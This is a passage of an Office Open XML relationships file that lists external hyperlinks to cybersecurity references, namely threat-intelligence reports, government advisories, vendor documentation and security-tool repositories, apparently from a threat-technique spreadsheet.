Target="https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET" TargetMode="External"/><Relationship Id="rId2761" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" TargetMode="External"/><Relationship Id="rId2859" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/BIOS" TargetMode="External"/><Relationship Id="rId733" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x48.html" TargetMode="External"/><Relationship Id="rId940" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware" TargetMode="External"/><Relationship Id="rId1016" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nettitude/PoshC2_Python" TargetMode="External"/><Relationship Id="rId1570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files" TargetMode="External"/><Relationship Id="rId1668" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx" TargetMode="External"/><Relationship Id="rId1875" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication" TargetMode="External"/><Relationship Id="rId2414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor" TargetMode="External"/><Relationship Id="rId2621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/ph/security/news/cybercrime-and-digital-threats/qakbot-resurges-spreads-through-vbs-files" TargetMode="External"/><Relationship Id="rId2719" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA17-318A" TargetMode="External"/><Relationship Id="rId800" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf" TargetMode="External"/><Relationship Id="rId1223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/unraveling-the-lamberts-toolkit/77990/" TargetMode="External"/><Relationship Id="rId1430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/" TargetMode="External"/><Relationship Id="rId1528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)" TargetMode="External"/><Relationship Id="rId2926" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/" TargetMode="External"/><Relationship Id="rId3090" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc" TargetMode="External"/><Relationship Id="rId1735" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc754820.aspx" TargetMode="External"/><Relationship Id="rId1942" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf" TargetMode="External"/><Relationship Id="rId1802" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings" TargetMode="External"/><Relationship Id="rId3048" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dhondta/awesome-executable-packing" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://citizenlab.ca/2018/08/familiar-feeling-a-malware-campaign-targeting-the-tibetan-diaspora-resurfaces/" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secureworks.com/resources/blog/living-off-the-land/" TargetMode="External"/><Relationship Id="rId2064" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453" TargetMode="External"/><Relationship Id="rId2271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/" TargetMode="External"/><Relationship Id="rId688" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf" TargetMode="External"/><Relationship Id="rId895" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf" TargetMode="External"/><Relationship Id="rId1080" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/compute/docs/reference/rest/v1/instances" TargetMode="External"/><Relationship Id="rId2131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules" TargetMode="External"/><Relationship Id="rId2369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-spring-dragon-apt/70726/" TargetMode="External"/><Relationship Id="rId2576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatconnect.com/blog/infrastructure-research-hunting/" TargetMode="External"/><Relationship Id="rId2783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/siloscape/" TargetMode="External"/><Relationship Id="rId2990" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" TargetMode="External"/><Relationship Id="rId755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/" TargetMode="External"/><Relationship Id="rId962" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence" TargetMode="External"/><Relationship Id="rId1178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html" TargetMode="External"/><Relationship Id="rId1385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/" TargetMode="External"/><Relationship Id="rId1592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-US/library/ms682586" TargetMode="External"/><Relationship Id="rId2229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/calisto-trojan-for-macos/86543/" TargetMode="External"/><Relationship Id="rId2436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/samsam-targeted-ransomware-attacks" TargetMode="External"/><Relationship Id="rId2643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET" TargetMode="External"/><Relationship Id="rId2850" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.alienvault.com/open-threat-exchange/blog/another-sykipot-sample-likely-targeting-us-federal-agencies" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/" TargetMode="External"/><Relationship Id="rId615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf" TargetMode="External"/><Relationship Id="rId822" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" TargetMode="External"/><Relationship Id="rId1038" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hfiref0x/TDL" TargetMode="External"/><Relationship Id="rId1245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/transparent-tribe-part-1/98127/" TargetMode="External"/><Relationship Id="rId1452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://content.fireeye.com/m-trends/rpt-m-trends-2020" TargetMode="External"/><Relationship Id="rId1897" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/" TargetMode="External"/><Relationship Id="rId2503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html" TargetMode="External"/><Relationship Id="rId2948" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/Systemd/Timers" TargetMode="External"/><Relationship Id="rId1105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin" TargetMode="External"/><Relationship Id="rId1312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lastline.com/labsblog/defeating-darkhotel-just-in-time-decryption/" TargetMode="External"/><Relationship Id="rId1757" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material" TargetMode="External"/><Relationship Id="rId1964" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943" TargetMode="External"/><Relationship Id="rId2710" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/press-release/file/1328521/download" TargetMode="External"/><Relationship Id="rId2808" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html" TargetMode="External"/><Relationship Id="rId1617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN" TargetMode="External"/><Relationship Id="rId1824" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-16/materials/us-16-Quintin-When-Governments-Attack-State-Sponsored-Malware-Attacks-Against-Activists-Lawyers-And-Journalists.pdf" TargetMode="External"/><Relationship Id="rId2086" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ietf.org/html/rfc1918" TargetMode="External"/><Relationship Id="rId2293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html" TargetMode="External"/><Relationship Id="rId2598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/conficker" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report" TargetMode="External"/><Relationship Id="rId2153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/" TargetMode="External"/><Relationship Id="rId2360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/kb/197571" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2020/bandook-signed-delivered/" TargetMode="External"/><Relationship Id="rId777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&amp;rep=rep1&amp;type=pdf" TargetMode="External"/><Relationship Id="rId984" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GhostPack/Certify/" TargetMode="External"/><Relationship Id="rId2013" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html" TargetMode="External"/><Relationship Id="rId2220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworld.io/industry-news/how-secure-is-your-slack-channel" TargetMode="External"/><Relationship Id="rId2458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore" TargetMode="External"/><Relationship Id="rId2665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf" TargetMode="External"/><Relationship Id="rId2872" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Loadable_kernel_module" TargetMode="External"/><Relationship Id="rId637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" TargetMode="External"/><Relationship Id="rId844" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html" TargetMode="External"/><Relationship Id="rId1267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://helgeklein.com/blog/2010/04/active-setup-explained/" TargetMode="External"/><Relationship Id="rId1474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/" TargetMode="External"/><Relationship Id="rId1681" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal" TargetMode="External"/><Relationship Id="rId2318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://assets.sentinelone.com/labs/sentinel-one-valak-i" TargetMode="External"/><Relationship Id="rId2525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc755121.aspx" TargetMode="External"/><Relationship Id="rId2732" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA18-074A" TargetMode="External"/><Relationship Id="rId704" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf" TargetMode="External"/><Relationship Id="rId911" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" TargetMode="External"/><Relationship Id="rId1127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100" TargetMode="External"/><Relationship Id="rId1334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tldp.org/HOWTO/Module-HOWTO/x197.html" TargetMode="External"/><Relationship Id="rId1541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/" TargetMode="External"/><Relationship Id="rId1779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId1986" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera" TargetMode="External"/><Relationship Id="rId1401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" TargetMode="External"/><Relationship Id="rId1639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/exchange/get-inboxrule?view=exchange-ps" TargetMode="External"/><Relationship Id="rId1846" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.morphisec.com/cobalt-gang-2.0" TargetMode="External"/><Relationship Id="rId3061" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man2/setuid.2.html" TargetMode="External"/><Relationship Id="rId1706" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb" TargetMode="External"/><Relationship Id="rId1913" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20160226161828/https:/www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/aa21-008a" TargetMode="External"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/" TargetMode="External"/><Relationship Id="rId2175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840" TargetMode="External"/><Relationship Id="rId2382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html" TargetMode="External"/><Relationship Id="rId3019" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/mac-application-bundles/" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" TargetMode="External"/><Relationship Id="rId799" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf" TargetMode="External"/><Relationship Id="rId1191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html" TargetMode="External"/><Relationship Id="rId2035" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://powersploit.readthedocs.io/" TargetMode="External"/><Relationship Id="rId2687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/" TargetMode="External"/><Relationship Id="rId2894" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/press-release/file/1084361/download" TargetMode="External"/><Relationship Id="rId659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" TargetMode="External"/><Relationship Id="rId866" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html" TargetMode="External"/><Relationship Id="rId1289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/" TargetMode="External"/><Relationship Id="rId1496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96" TargetMode="External"/><Relationship Id="rId2242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/" TargetMode="External"/><Relationship Id="rId2547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc787851.aspx" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.bishopfox.com/tech-blog/sliver" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/cybereason-vs.-whispergate-wiper" TargetMode="External"/><Relationship Id="rId1051" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jaredhaight/PSAttack" TargetMode="External"/><Relationship Id="rId1149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.imperva.com/learn/ddos/booters-stressers-ddosers/" TargetMode="External"/><Relationship Id="rId1356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/" TargetMode="External"/><Relationship Id="rId2102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/" TargetMode="External"/><Relationship Id="rId2754" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/" TargetMode="External"/><Relationship Id="rId2961" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20210825130434/https:/cobaltstrike.com/downloads/csmanual38.pdf" TargetMode="External"/><Relationship Id="rId726" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" TargetMode="External"/><Relationship Id="rId933" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-command-and-control" TargetMode="External"/><Relationship Id="rId1009" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/itsreallynick/office-crackros" TargetMode="External"/><Relationship Id="rId1563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg" TargetMode="External"/><Relationship Id="rId1770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit" TargetMode="External"/><Relationship Id="rId1868" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" TargetMode="External"/><Relationship Id="rId2407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates" TargetMode="External"/><Relationship Id="rId2614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" TargetMode="External"/><Relationship Id="rId2821" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vmray.com/cyber-security-blog/osaminer-uses-applescripts-evade-detection-malware-analysis-spotlight/" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html" TargetMode="External"/><Relationship Id="rId1216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" TargetMode="External"/><Relationship Id="rId1423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/" 